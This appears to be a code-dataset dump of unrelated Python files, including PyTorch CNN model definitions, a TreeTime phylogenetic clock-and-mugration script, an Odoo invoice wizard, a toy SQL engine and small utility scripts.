nn.BatchNorm2d(128),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(kernel_size=2, stride=2),\n\n nn.Conv2d(128, 256, 3, padding=1), #input:36×36×128 output:36×36×256\n nn.BatchNorm2d(256),\n nn.ReLU(inplace=True),\n nn.Conv2d(256, 256, 3, padding=1), #input:36×36×256 output:36×36×256\n nn.BatchNorm2d(256),\n nn.ReLU(inplace=True),\n nn.Conv2d(256, 256, 3, padding=1), #input:36×36×256 output:36×36×256\n nn.BatchNorm2d(256),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(kernel_size=2, stride=2),\n\n nn.Conv2d(256, 512, 3, padding=1), #input:18×18×256 output:18×18×512\n nn.BatchNorm2d(512),\n nn.ReLU(inplace=True),\n nn.Conv2d(512, 512, 3, padding=1), #input:18×18×512 output:18×18×512\n nn.BatchNorm2d(512),\n nn.ReLU(inplace=True),\n nn.Conv2d(512, 512, 3, padding=1), #input:18×18×512 output:18×18×512\n nn.BatchNorm2d(512),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(kernel_size=2, stride=2),\n )\n\n # 全結合層\n # 多層パーセプトロンにより必要な特徴の重み付けを行い識別を行う\n # 多層なので非線形識別が可能\n # Linear(input_dim, output_dim)\n # 全結合層\n # input_dim : 入力の次元数(全結合層は1次元配列が入力のため次元数はintでいい)\n # output_dim : 出力の次元数\n self.linear = nn.Sequential(\n nn.Linear(9*9*512, 2048), #input:9×9×512(1dim vec) output:1×1×2048\n nn.ReLU(inplace = True),\n nn.Linear(2048, 1024), #input:1×1×2048 output:1×1×1024\n nn.ReLU(inplace = True),\n nn.Linear(1024, 512), #input:1×1×1024 output:1×1×512\n nn.ReLU(inplace = True),\n )\n\n # クラス分類器(ArcFaceLossに含まれるため今回は使わない)\n self.classifier = nn.Linear(512, num_class)\n\n # 順伝播\n # 逆伝播は自動でやってくれる\n def forward(self, x):\n x = self.feature_extractor(x) # 特徴抽出\n x = x.view(-1, 9*9*512) # 1次元配列に変更\n x = self.linear(x) # 全結合層へ入力\n #x = self.classifier(x)\n\n return x\n\n# モデル定義(ResNet50ベース)\nclass ResNet_based(nn.Module):\n def __init__(self, num_classes):\n super().__init__()\n # Skip Connectionにより計算されない情報を送ることで層を重ねることによる初めの方の情報の欠落を防ぐ\n # 加えてデータの流れが分岐するため疑似的なアンサンブルモデルと捉えることが可能\n # 実装はhttps://www.bigdata-navi.com/aidrops/2611/を参考に行った\n #\n # 畳み込みを1回挿む\n self.head = nn.Sequential(\n nn.Conv2d(3, 64, 3, padding=1),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(kernel_size=2, stride=2)\n )\n # 
Block 1\n self.block0 = self._building_block(256, channel_in=64)\n self.block1 = nn.ModuleList([\n self._building_block(256) for _ in range(2)\n ])\n self.conv2 = nn.Conv2d(256, 512, 1, stride=(2, 2))\n # Block 2\n self.block2 = nn.ModuleList([\n self._building_block(512) for _ in range(4)\n ])\n self.conv3 = nn.Conv2d(512, 1024, 1, stride=(2, 2))\n # Block 3\n self.block3 = nn.ModuleList([\n self._building_block(1024) for _ in range(6)\n ])\n self.conv4 = nn.Conv2d(1024, 2048, 1, stride=(2, 2))\n # Block 4\n self.block4 = nn.ModuleList([\n self._building_block(2048) for _ in range(3)\n ])\n self.avg_pool = GlobalAvgPool2d() # x.viewの代わりにGAPを使用\n self.fc = nn.Linear(2048, 512)\n self.out = nn.Linear(512, num_classes) # ArcFaceLossに含まれるため今回は使わない\n\n # 順伝播\n def forward(self, x):\n x = self.head(x)\n x = self.block0(x)\n for block in self.block1:\n x = block(x)\n x = self.conv2(x)\n for block in self.block2:\n x = block(x)\n x = self.conv3(x)\n for block in self.block3:\n x = block(x)\n x = self.conv4(x)\n for block in self.block4:\n x = block(x)\n x = self.avg_pool(x)\n x = self.fc(x)\n x = torch.relu(x)\n #x = self.out(x)\n #x = torch.log_softmax(x, dim=-1)\n\n return x\n\n def _building_block(self, channel_out, channel_in=None):\n if channel_in is None:\n channel_in = channel_out\n return ResBlock(channel_in, channel_out)\n\n\n# ResNetを構成するブロックを生成するクラス\n# 実装はhttps://www.bigdata-navi.com/aidrops/2611/を参考に行った\nclass ResBlock(nn.Module):\n def __init__(self, channel_in, channel_out):\n super().__init__()\n channel = channel_out\n\n self.block = nn.Sequential(\n nn.Conv2d(channel_in, channel, 1),\n nn.BatchNorm2d(channel),\n nn.ReLU(inplace=True),\n nn.Conv2d(channel, channel, 3, padding=1),\n nn.BatchNorm2d(channel),\n nn.ReLU(inplace=True),\n nn.Conv2d(channel, channel_out, 1, padding=0),\n nn.BatchNorm2d(channel_out),\n )\n self.shortcut = self._shortcut(channel_in, channel_out)\n self.relu = nn.ReLU(inplace=True)\n\n def forward(self, x):\n h = self.block(x)\n shortcut = self.shortcut(x)\n x = self.relu(h + shortcut)\n return x\n\n def _shortcut(self, channel_in, channel_out):\n if channel_in != channel_out:\n return self._projection(channel_in, channel_out)\n else:\n return lambda x: x\n\n def _projection(self, channel_in, channel_out):\n return nn.Conv2d(channel_in, channel_out, 1, padding=0)\n\n# GAPを計算するクラス\n# 実装はhttps://www.bigdata-navi.com/aidrops/2611/を参考に行った\nclass GlobalAvgPool2d(nn.Module):\n def __init__(self):\n super().__init__()\n\n def forward(self, x):\n return F.avg_pool2d(x, kernel_size=x.size()[2:]).view(-1, x.size(1))\n\n\n# 学習済みResNet50を利用(全結合層のみ定義し直し)\n# torchvisionに含まれるResNet50学習済みモデルを使用\n# 実装はhttps://pytorch.org/vision/0.8/_modules/torchvision/models/resnet.htmlを参考に行った\nclass PretrainedResNet(nn.Module):\n def __init__(self, embedding_size):\n super().__init__()\n self.pretrained_resnet = models.resnet50(pretrained=True)\n self.fc = nn.Linear(2048, 512) #学習済みresnetの全結合層のみ入れ替え\n\n def forward(self, x):\n x = self.pretrained_resnet.conv1(x)\n x = self.pretrained_resnet.bn1(x)\n x = self.pretrained_resnet.relu(x)\n x = self.pretrained_resnet.maxpool(x)\n x = self.pretrained_resnet.layer1(x)\n x = self.pretrained_resnet.layer2(x)\n x = self.pretrained_resnet.layer3(x)\n x = self.pretrained_resnet.layer4(x)\n x = self.pretrained_resnet.avgpool(x)\n x = torch.flatten(x, 1)\n x = self.fc(x) #最終的なclassifierはArcFaceLossに含まれるため省略\n return 
x\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":10874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"117215952","text":"#!/usr/bin/env python3\nimport subprocess\nimport shlex\nfrom Bio import Phylo\nfrom Bio import SeqIO\nfrom Bio.Seq import Seq\nimport matplotlib.pyplot as plt\nimport treetime as tt\nfrom treetime import TreeTime\nfrom treetime import wrappers\nfrom treetime.utils import parse_dates\nimport pandas as pd\nimport argparse\nimport ast\nimport csv\n\n\ndef label_nodes(tre):\n\tnode_counter=0\n\tfor item in tre.get_nonterminals():\n\t\titem.confidence = None\n\t\tif item.name is None:\n\t\t\titem.name = 'NODE_'+format(node_counter, '07d')\n\t\t\tnode_counter+=1\n\treturn(tre)\n\n\ndef make_regions_dict(wi_file, metadata_file):\n\twi_regions = pd.read_csv(wi_file)\n\twi_tips= {item['Sample Name']: item['wisconsin_catchment_area'] for \n\t\t\t\t\tindex, item in wi_regions.iterrows()}\n\tmetadata = pd.read_csv(metadata_file, sep='\\t')\n\tusa_tips = {item['strain']: item['division'] for index, item in metadata[metadata['country'] == 'USA'].iterrows()}\n\tglobal_tips = {item['strain']: item['country'] for index, item in metadata[metadata['country'] != 'USA'].iterrows()}\n\tregions = wi_tips.copy()\n\tincluded_keys = set(wi_tips.keys())\n\tfor key, value in usa_tips.items():\n\t\tif key not in included_keys:\n\t\t\tregions[key] = value\n\tincluded_keys.update(usa_tips.keys())\n\tfor key, value in global_tips.items():\n\t\tif key not in included_keys:\n\t\t\tregions[key] = value\n\treturn(regions)\n\n\ndef infer_timetree(tre, aln_file, dates, outgroup, resolve, out_path):\n\ttre_path = f'{out_path}/ml.newick'\n\twith open(tre_path, 'w') as out_file:\n\t\tPhylo.write(tre, out_file, 'newick', format_branch_length='%1.8f')\n\ttre = TreeTime(gtr='JC69', tree=tre, precision='auto',\n\t aln=aln_file, verbose=2, dates=dates)\n\t# from NextStrain Augur refine.py\n\t# treetime clock filter will mark, but not remove bad tips\n\ttre.clock_filter(reroot=outgroup, n_iqd=4, plot=False) \n\t# remove them explicitly\n\tleaves = [x for x in tre.tree.get_terminals()]\n\tfor n in leaves:\n\t\tif n.bad_branch:\n\t\t\ttre.tree.prune(n)\n\t\t\tprint('pruning leaf ', n.name)\n\t# fix treetime set-up for new tree topology\n\ttre.prepare_tree()\n\tprint(f'resolve polytomies: {resolve}')\n\ttre.run(root=outgroup, infer_gtr=True, max_iter=2,\n\t branch_length_mode='auto', resolve_polytomies=resolve,\n\t time_marginal='assign', vary_rate=0.0004, fixed_clock_rate=0.0008)\n\ttimes = pd.DataFrame({'name': [item.name for item in tre.tree.find_clades()],\n\t\t\t\t\t\t 'date': [item.date for item in tre.tree.find_clades()],\n\t\t\t\t\t\t 'lower': [list(tre.get_max_posterior_region(item))[0] for item in tre.tree.find_clades()],\n\t\t\t\t\t\t 'upper': [list(tre.get_max_posterior_region(item))[1] for item in tre.tree.find_clades()]}, \n\t\t\t\t\t\t index = range(0, len([item for item in tre.tree.find_clades()])))\n\ttimes.to_csv(tre_path.replace('.newick', '_refined_node_times.csv'))\n\t# Saves refined tree\n\twith open(tre_path.replace('.newick', '_refined.newick'), 'w') as out_file:\n\t\tPhylo.write(tre.tree, out_file, 'newick', format_branch_length='%1.8f')\n\ttre.branch_length_to_years()\n\twith open(tre_path.replace('.newick', '_refined_time.newick'), 'w') as out_file:\n\t\tPhylo.write(tre.tree, out_file, 'newick', format_branch_length='%1.8f')\n\treturn(tre)\n\n\ndef infer_mugration(tre, aln_file, 
regions, out_path):\n\ttre, letter_to_state, state_to_letter = \\\n\t\twrappers.reconstruct_discrete_traits(tre, regions, \n\t\t\tsampling_bias_correction=2.5)\n\tpd.DataFrame({'letter':list(letter_to_state.keys()), \n\t\t\t\t \t\t\t\t'region': list(letter_to_state.values())}).\\\n\t\t\t\t\t\t\t\tto_csv(f'{out_path}/ml_refined_regions.csv', index=False)\n\tpd.DataFrame({'name': [item.name for item in tre.tree.find_clades()],\n\t\t\t\t 'state': [list(item.marginal_profile[0]) for item in tre.tree.find_clades()]}).\\\n\t\t\t\t\tto_csv(f'{out_path}/ml_refined_node_states.csv', index=False)\n\treturn(tre, letter_to_state, state_to_letter)\n\n\ndef main():\n\tparser = argparse.ArgumentParser()\n\t# input files\n\tparser.add_argument('--out_dir', \n\t\t\t\t\t\thelp='output directory', \n\t\t\t\t\t\tdefault='results')\n\tparser.add_argument('--aln_file', \n\t\t\t\t\t\thelp='alignment with nearest neighbors', \n\t\t\t\t\t\tdefault='data/subsampled_alignment_neighbors.fasta')\n\tparser.add_argument('--tree_file', \n\t\t\t\t\t\thelp='tree from which to estimate clock rate',\n\t\t\t\t\t\tdefault='results/subsampled_alignment_neighbors.fasta.treefile')\n\tparser.add_argument('--metadata_file',\n\t\t\t\t\t\thelp='metadata file',\n\t\t\t\t\t\tdefault='data/metadata_adjusted.tsv')\n\tparser.add_argument('--mke_dane_file',\n\t\t\t\t\thelp='file with list of sequences from Dane and MKE',\n\t\t\t\t\tdefault='data/MKEvsDane.csv')\n\tparser.add_argument('--outgroup',\n\t\t\t\t\thelp='Outgroup to use in tree',\n\t\t\t\t\tdefault='Wuhan/Hu-1/2019')\n\tparser.add_argument('--resolve', dest='resolve', action='store_true')\n\tparser.add_argument('--no-resolve', dest='resolve', action='store_false')\n\tparser.set_defaults(resolve=False)\n\targs = parser.parse_args()\n\tsubprocess.run(shlex.split(f'mkdir {args.out_dir}'))\n\tregions_dict = make_regions_dict(args.mke_dane_file, args.metadata_file)\n\ttre = Phylo.read(args.tree_file, 'newick')\n\ttre.root_with_outgroup(args.outgroup)\t\t# operates in place\n\ttre = label_nodes(tre)\t# labels nodes of tree\n\tdates = parse_dates(args.metadata_file)\t# parses tip dates\n\ttimetree_tre = infer_timetree(tre, args.aln_file, dates, args.outgroup, args.resolve, args.out_dir)\n\t# infers mugration\n\ttre, letter_to_state, state_to_letter = \\\n\t\tinfer_mugration(timetree_tre.tree, args.aln_file, regions_dict, args.out_dir)\n\n\nif __name__ == \"__main__\":\n\tmain()\n\n","sub_path":"data_raw/Source Data/introductions/code/infer_clock_mugration.py","file_name":"infer_clock_mugration.py","file_ext":"py","file_size_in_byte":5445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"640896567","text":"\nfrom odoo import api, fields, models, _\nfrom odoo.exceptions import UserError\n\n\nclass PosCreateInvoice(models.TransientModel):\n\n _name = 'pos.create.invoice'\n\n start_date = fields.Datetime(required=True)\n end_date = fields.Datetime(required=True)\n partner_id = fields.Many2one('res.partner', 'Customer', required=True)\n is_load = fields.Boolean('Load')\n pos_order_ids = fields.Many2many('pos.order', 'pos_order_invoice')\n\n def get_pos_order(self):\n\n rec = self.env['pos.order'].search([('date_order', '>=', self.start_date), (\n 'date_order', '<=', self.end_date), ('partner_id', '=', self.partner_id.id), ('state', '=', 'credit_note')])\n self.pos_order_ids = [(6, 0, rec.ids)]\n self.is_load = True\n return {\n 'name': _(\"Create Invoice\"),\n 'view_mode': 'form',\n 'view_id': False,\n 'res_model': 
'pos.create.invoice',\n 'res_id': self.id,\n 'type': 'ir.actions.act_window',\n 'nodestroy': True,\n 'target': 'new',\n 'domain': '[]',\n 'context': self.env.context\n }\n\n def pos_create_invoice(self):\n line_ids = []\n inv_val = {}\n inv_val.update(\n {'partner_id': self.partner_id.id, 'type': 'out_invoice'})\n for order in self.pos_order_ids:\n name = order.name + ' Date :- ' + str(order.date_order.date())\n line_val_rec = {\n 'name': name,\n 'display_type': 'line_section'\n }\n line_ids.append((0, 0, line_val_rec))\n for line in order.lines:\n line_val = {\n 'product_id': line.product_id.id,\n 'name': line.product_id.name,\n 'quantity': line.qty,\n 'price_unit': line.price_unit,\n 'discount': line.discount,\n 'tax_ids': [(6, 0, line.tax_ids.ids)],\n }\n line_ids.append((0, 0, line_val))\n inv_val.update({'invoice_line_ids': line_ids})\n rec = self.env['account.move'].create(inv_val)\n self.pos_order_ids.write({'state': 'done'})\n return {\n 'name': _(\"Invoices\"),\n 'view_mode': 'form',\n 'view_id': False,\n 'res_model': 'account.move',\n 'res_id': rec.id,\n 'type': 'ir.actions.act_window',\n 'nodestroy': True,\n 'target': 'new',\n 'domain': '[]',\n 'context': self.env.context\n }\n","sub_path":"fan_coffee_pos 3/wizard/create_invoice.py","file_name":"create_invoice.py","file_ext":"py","file_size_in_byte":2561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"154710342","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\"\"\"\n-------------------------------------------------\n Author:jason\n date:2018/3/17\n-------------------------------------------------\n Change Activity:2018/3/17:\n-------------------------------------------------\n\"\"\"\nfrom stanfordcorenlp import StanfordCoreNLP\nfrom util.io import IOUtil\n\nif __name__ == '__main__':\n\tinput = 'sentences.utf-8'\n\ttext = IOUtil.load_files([input])\n\t# print(text)\n\t\n\twords = []\n\t\n\tnlp = StanfordCoreNLP('http://corenlp.run', port=80, lang='zh')\n\t\n\tfor line in text:\n\t\tl = nlp.word_tokenize(line)\n\t\twords.extend(' '.join(l))\n\t\twords.append('\\n')\n\tnlp.close()\n\tIOUtil.save_to_file(words, 'words.utf-8')\n","sub_path":"basic/2word_segment.py","file_name":"2word_segment.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"155311395","text":"\nimport joblib\nimport numpy as np\nfrom sklearn.metrics import r2_score, mean_squared_error, mean_absolute_error\nfrom sklearn.model_selection import train_test_split\n\nimport tensorflow as tf\nfrom tensorflow.keras.layers import Lambda\n\n# calculates the square root of the square of a tensor maintaining the dimension (m,s1,n) --> (m,s1,1)\ndef srs(tensor):\n\n tensor_srs = Lambda(lambda x: tf.math.sqrt(\n tf.math.reduce_sum(\n tf.math.square(x), axis=-1, keepdims=True\n )\n ))(tensor)\n\n return tensor_srs\n\n\ndef load_model(X: None, y: None, seed: None, test_size: None, model: None):\n # split data into train and test sets\n seed = seed\n test_size = test_size\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=test_size, random_state=seed)\n\n # load model from file\n loaded_model = joblib.load(model)\n\n # predictions\n predictions = loaded_model.predict(X_test)\n\n # evaluate predictions\n return r2_score(y_test, predictions), mean_squared_error(y_test, predictions), mean_absolute_error(y_test,\n predictions)\ndef mean_absolute_percentage_error(y_true, y_pred):\n y_true, y_pred = 
np.array(y_true), np.array(y_pred)\n return np.mean(np.abs((y_true - y_pred) / y_true)) * 100\n\nclass BatchPreProcessor(object):\n\n def normalize(self, x, vmax, vmin):\n self.v = (x - vmin) / (vmax - vmin)\n return self.v\n\n def normalize_a_b(self, x, vmax, vmin, a, b):\n self.v = (b - a) * ((x - vmin) / (vmax - vmin)) + a\n return self.v\n\n def positive(self, x):\n return -x if x < 0 else x\n\n def normalize_matrix(self, x):\n self.f = np.vectorize(self.normalize, otypes=[float])\n for i in range(x.shape[1]):\n self.vmax = np.max(x[:, i])\n self.vmin = np.min(x[:, i])\n x[:, i] = self.f(x[:, i], self.vmax, self.vmin)\n return x\n\n def normalize_matrix_a_b(self, x, a, b):\n self.f = np.vectorize(self.normalize_a_b, otypes=[float])\n self.vmax = np.max(x)\n self.vmin = np.min(x)\n for c in range(x.shape[1]):\n for r in range(x.shape[0]):\n x[r, c] = self.normalize_a_b(x[r, c], self.vmax, self.vmin, a, b)\n return x\n\n def positive_matrix(self, x):\n self.f = np.vectorize(self.positive, otypes=[float])\n for c in range(x.shape[1]):\n for r in range(x.shape[0]):\n x[r, c] = self.f(x[r, c])\n return x\n","sub_path":"utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"182713125","text":"n=int(input(\"Enter the limit: \"))\npn=1\ncn=0\nwhile(n):\n print(cn)\n cn=cn+pn\n pn=cn-pn\n n=n-1\nprint(\"Press any key to continue...\")\ninput()\n \n","sub_path":"Python programs/Fibonacci.py","file_name":"Fibonacci.py","file_ext":"py","file_size_in_byte":165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"124694607","text":"\n\nfrom xai.brain.wordbase.nouns._jackhammer import _JACKHAMMER\n\n#class header\nclass _JACKHAMMERS(_JACKHAMMER, ):\n\tdef __init__(self,): \n\t\t_JACKHAMMER.__init__(self)\n\t\tself.name = \"JACKHAMMERS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"jackhammer\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_jackhammers.py","file_name":"_jackhammers.py","file_ext":"py","file_size_in_byte":266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"1897964","text":"from i3Deep import utils\r\nimport numpy as np\r\nfrom tqdm import tqdm\r\nimport os\r\nimport json\r\nimport copy\r\nimport shutil\r\nfrom pathlib import Path\r\nimport SimpleITK as sitk\r\n\r\nimage_path = \"/gris/gris-f/homelv/kgotkows/datasets/nnUnet_datasets/nnUNet_raw_data/nnUNet_raw_data/Task070_guided_all_public_ggo/imagesTs1/\"\r\nkgu_image_path = \"/gris/gris-f/homelv/kgotkows/datasets/covid19/UK_Frankfurt3_dataset/images/\"\r\n\r\nimage_filenames = utils.load_filenames(image_path)\r\nkgu_image_filenames = utils.load_filenames(kgu_image_path)\r\n\r\nmapping = []\r\nkgu_shapes = {}\r\n\r\nfor kgu_image_filename in tqdm(kgu_image_filenames, desc=\"KGU\"):\r\n kgu_name = os.path.basename(kgu_image_filename)[:-7]\r\n # kgu_image, _, _, _ = utils.load_nifty(kgu_image_filename)\r\n # kgu_shapes[kgu_name] = kgu_image.shape\r\n # Set up the reader and get the file information\r\n reader = sitk.ImageFileReader()\r\n reader.SetFileName(kgu_image_filename) # Give it the mha file as a string\r\n reader.LoadPrivateTagsOn() # Make sure it can get all the info\r\n reader.ReadImageInformation() # Get just the information from the file\r\n shape = reader.GetSize() # If you want the x, y, z\r\n kgu_shapes[kgu_name] = shape\r\n\r\nfor image_filename in 
tqdm(image_filenames, desc=\"Image\"):\r\n name = os.path.basename(image_filename)[:-7]\r\n image, affine, spacing, header = utils.load_nifty(image_filename)\r\n found = False\r\n for kgu_image_filename in tqdm(kgu_image_filenames, desc=\"KGU\"):\r\n kgu_name = os.path.basename(kgu_image_filename)[:-7]\r\n if image.shape == kgu_shapes[kgu_name]:\r\n kgu_image, _, _, _ = utils.load_nifty(kgu_image_filename)\r\n\r\n if np.allclose(image, kgu_image, atol=5):\r\n mapping.append({\"Name\": name, \"KGU\": kgu_name})\r\n print(\"{} = {}\".format(name, kgu_name))\r\n kgu_image_filenames.remove(kgu_image_filename)\r\n found = True\r\n break\r\n if not found:\r\n raise RuntimeError(\"No mapping found!\")\r\nprint(mapping)\r\n","sub_path":"i3Deep/mask_recommendation/compute_mapping.py","file_name":"compute_mapping.py","file_ext":"py","file_size_in_byte":2040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"178093565","text":"class Connection(object):\n def __init__(self, filename):\n \"\"\"\n Takes a filename, but doesn't do anything with it.\n (The filename will be used in a future project).\n \"\"\"\n self.myDatabase = Database()\n #_ALL_DATABASES[self.myDatabase]\n\n def execute(self, statement):\n \"\"\"\n Takes a SQL statement.\n Returns a list of tuples (empty unless select statement \n with rows to return).\n \"\"\" \n\n\n #query = 'INSERT INTO student VALUES (\"Tyler\" ,4.0);'\n #answer = [\"SELECT\", \"*\", \"FROM\", \"pokemon\", \"ORDER\", \"BY\", \"id\", \",\", \"type\", \";\"]\n result = []\n while statement:\n token, rest = get_first_token(statement)\n result.append(token)\n statement = rest\n\n newList = []\n items = '\"(),;'\n for item in result:\n if item in items:\n pass\n else:\n newList.append(item)\n\n\n \n statement = newList\n \n \n listOfTuples = []\n\n #statement = statement.split(' ')\n #statement = list(statement)\n #''.join([o for o in statement if not o in string.punctuation]).split()\n #print(statement)\n #statement = self.parseAttributes(statement)\n\n # Checks if the sql command is CREATE TABLE\n if (str(statement[0]) == 'CREATE' and str(statement[1]) == 'TABLE'):\n key = str(statement[2])\n statement = statement[3:]\n\n attributes = self.parseAttributes(statement)\n \n self.myDatabase.createTable(key, attributes)\n \n elif (str(statement[0]) == 'INSERT' and str(statement[1]) == 'INTO'):\n tableName = statement[2]\n statement = statement[4:] #Gets rid of \"VALUES\" keyword\n\n attributes = self.parseAttributes(statement)\n\n self.myDatabase.database[tableName].insertInto(attributes)\n \n elif (str(statement[0]) == \"SELECT\"):\n statement = self.parseAttributes(statement)\n indexOfFrom = statement.index(\"FROM\")\n #means there are more than one item to select from the table\n #/not *\n table = statement[indexOfFrom + 1]\n indexofOrderBy = statement.index(\"BY\")\n \n orderBy = statement[indexofOrderBy + 1]\n\n indexOfLast = len(statement) - 1\n\n listOfThingsToOrder = []\n\n for i in range(indexofOrderBy+1, indexOfLast+1):\n listOfThingsToOrder.append(statement[i])\n \n\n attributes = self.myDatabase.database[table].attributes; #column headers\n #figure out where the item we are supposed to be sorting by is in the array\n indexesOfOrderBy = [] #in attributes\n for item in listOfThingsToOrder:\n indexofItem = attributes.index(item)\n indexesOfOrderBy.append(int(indexofItem/2))\n indexesOfOrderBy.reverse() #reverse order of indexes to order by\n \n\n #gets the multiple things to select\n selectWhat = []\n if 
(indexOfFrom > 2):\n for item in statement[1:indexOfFrom]:\n selectWhat.append(item)\n else:\n selectWhat.append(statement[1])\n\n\n\n\n unsortedList = []\n if (selectWhat[0] == \"*\"): #returns all rows\n for item in self.myDatabase.database[table].rows:\n unsortedList.append(item.returnRows())\n listOfTuples = sortTuples(unsortedList, indexesOfOrderBy)\n\n #returns certain items of row\n else:\n for item in self.myDatabase.database[table].rows:\n #unsortedList.append(item.returnMultipleItems(indexesOfSelect))\n unsortedList.append(item.returnRows())\n #unsorted list now has all the data in all rows\n\n #this decides what indexes to select \n indexesOfSelect = []\n for item in selectWhat:\n indexofItem = attributes.index(item)\n indexesOfSelect.append(int(indexofItem/2))\n print(\"start\")\n print(unsortedList)\n #this should be the thing to do the selecting \n\n #for item in unsortedList:\n\n #print(anotherArray)\n sortedTuples = sortTuples(unsortedList, indexesOfOrderBy)\n temp = []\n for item in sortedTuples:\n tempList = []\n for index in indexesOfSelect:\n tempList.append(item[index])\n x = tuple(tempList)\n temp.append(x)\n listOfTuples = temp\n\n #for item in indexOfAttributes:\n # returnArray.append(self.clearValues(self.values[item]))\n\n\n print(\"Return array\")\n #print(returnArray)\n #unsortedList.append(item.returnMultipleItems(indexesOfSelect))\n #this is how to get the rows \n #tempArray = []\n #for item in self.myDatabase.database[table].rows:\n # tempArray.append(clearValues(item.values[item]))\n\n\n \n\n #tempArray = []\n #for item in self.values:\n # tempArray.append(self.clearValues(item))\n\n \n\n\n\n print(indexesOfOrderBy)\n print(\"fic\")\n\n\n\n\n\n# listOfTuples = sortTuples(unsortedList, indexesOfOrderBy)\n print('ast')\n print(listOfTuples)\n #ordering dat shit \n #################\n ##for index in indexesOfOrderBy:\n # tempList = []\n # for item in unsortedList:\n # tempList.append(item[index])\n\n #nsortedList = tuple(unsortedList)\n #print(unsortedList)\n #sortedList = []\n\n\n\n #sorted(unsortedList, key=lambda x: x[1])\n\n # for i in range(0, len(listOfThingsToOrder)):\n # sorted(unsortedList, key=lambda x: x[0])\n\n\n\n\n \n\n\n\n \n\n #print(listOfTuples)\n #print(statement)\n return listOfTuples;\n\n def close(self):\n \"\"\"\n Empty method that will be used in future projects\n \"\"\"\n pass\n\n def parseAttributes(self, statement):\n attributes = []\n #print(statement)\n for i in range(0, len(statement)):\n #statement[i] = statement[i].translate('();\"')\n temp = statement[i]\n temp = temp.replace(\"(\", '')\n temp = temp.replace(\";\", '')\n temp = temp.replace(')', '')\n temp = temp.replace('\"', '')\n temp = temp.replace(\",\", '')\n temp.strip()\n attributes.append(temp)\n\n return tuple(attributes)\n\ndef clearValues(item):\n if (item == 'NULL'):\n return None\n elif (item.isdecimal()):\n return int(item)\n elif (not item.isalnum()):\n return float(item)\n else:\n return item\n\n\n######\n###### I will eventually need to convert the string numbers to ints\n######\ndef connect(filename):\n \"\"\"\n Creates a Connection object with the given filename\n \"\"\"\n\n return Connection(filename)\n\nclass Database(object):\n def __init__(self):\n self.database = {}\n\n def createTable(self, name, attributes):\n self.database[name] = Table(name, attributes)\n ##print (name)\n #print(attributes)\n\nclass Table(object):\n def __init__(self, name, attributes):\n self.name = name\n self.attributes = attributes\n self.rows = []\n \n def insertInto(self, 
values):\n self.rows.append(Row(values))\n #print(values)\n\n\nclass Row(object):\n def __init__(self, values):\n self.values = values\n def returnRows(self):\n tempArray = []\n for item in self.values:\n tempArray.append(self.clearValues(item))\n \n self.values = tuple(tempArray)\n \n return self.values\n\n def clearValues(self, item):\n if (item == 'NULL'):\n return None\n elif (item.isdecimal()):\n return int(item)\n elif (not item.isalnum()):\n return float(item)\n else:\n return item\n\n def returnMultipleItems(self, indexOfAttributes):\n returnArray = []\n for item in indexOfAttributes:\n returnArray.append(self.clearValues(self.values[item]))\n\n #self.values = tuple(returnArray)\n return tuple(returnArray)\n\n\n# print(indexOfAttributes)\n\n # print(tempArray)\nimport string\nnumbers = '0987654321.*'\n\ndef get_first_token(query):\n \"Return the first token and the rest of the query\"\n query = query.strip()\n first_letter = query[0]\n if first_letter in string.ascii_letters or first_letter in numbers:\n return get_word(query)\n if first_letter in '();,\"':\n return first_letter, query[1:]\n \ndef get_word(query):\n for i in range(len(query)):\n if query[i] not in string.ascii_letters and query[i] not in numbers:\n break\n return query[:i], query[i:]\n \ndef sortTuples(data, listOfIndexOfItem):\n#[('Josh', 4.0, 1), ('Tyler', 4.0, 2), ('Hancheng', 3.2, 2)]\n#SELECT * FROM student ORDER BY name, piazza;\n #sort by the second one first into list\n #pass in the second list into function recursively\n #then sort by the first one\n print(data)\n #print('sort tuples')\n #print(listOfIndexOfItem)\n for index in listOfIndexOfItem:\n #print(index)\n #print(data[1][index])\n data.sort(key = lambda x: '' if not str(x[index]) else str(x[index]))\n print(data)\n #data = sorted(data, key = lambda x: '' if not str(x[index]) else str(x[index]))\n\n #print(data)\n return data\n\n\n_ALL_DATABASES = {}\n","sub_path":"CSE480/Project2/project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":10089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"255317835","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport numpy as np\nimport emcee\nfrom astropy.io import ascii\nimport matplotlib.pyplot as plt\nfrom astropy.table import Table, Column\nimport math\nimport scipy as sp\nimport sys\nfrom PyAstronomy import pyasl\nfrom PyAstronomy.pyasl import foldAt\nimport scipy.optimize as op\nimport corner\nimport time as chrono\nfrom sympy.solvers import solve\nfrom sympy import Symbol\ntry:\n from tqdm import tqdm\nexcept ImportError:\n raise ImportError('You don t have the package tqdm installed. 
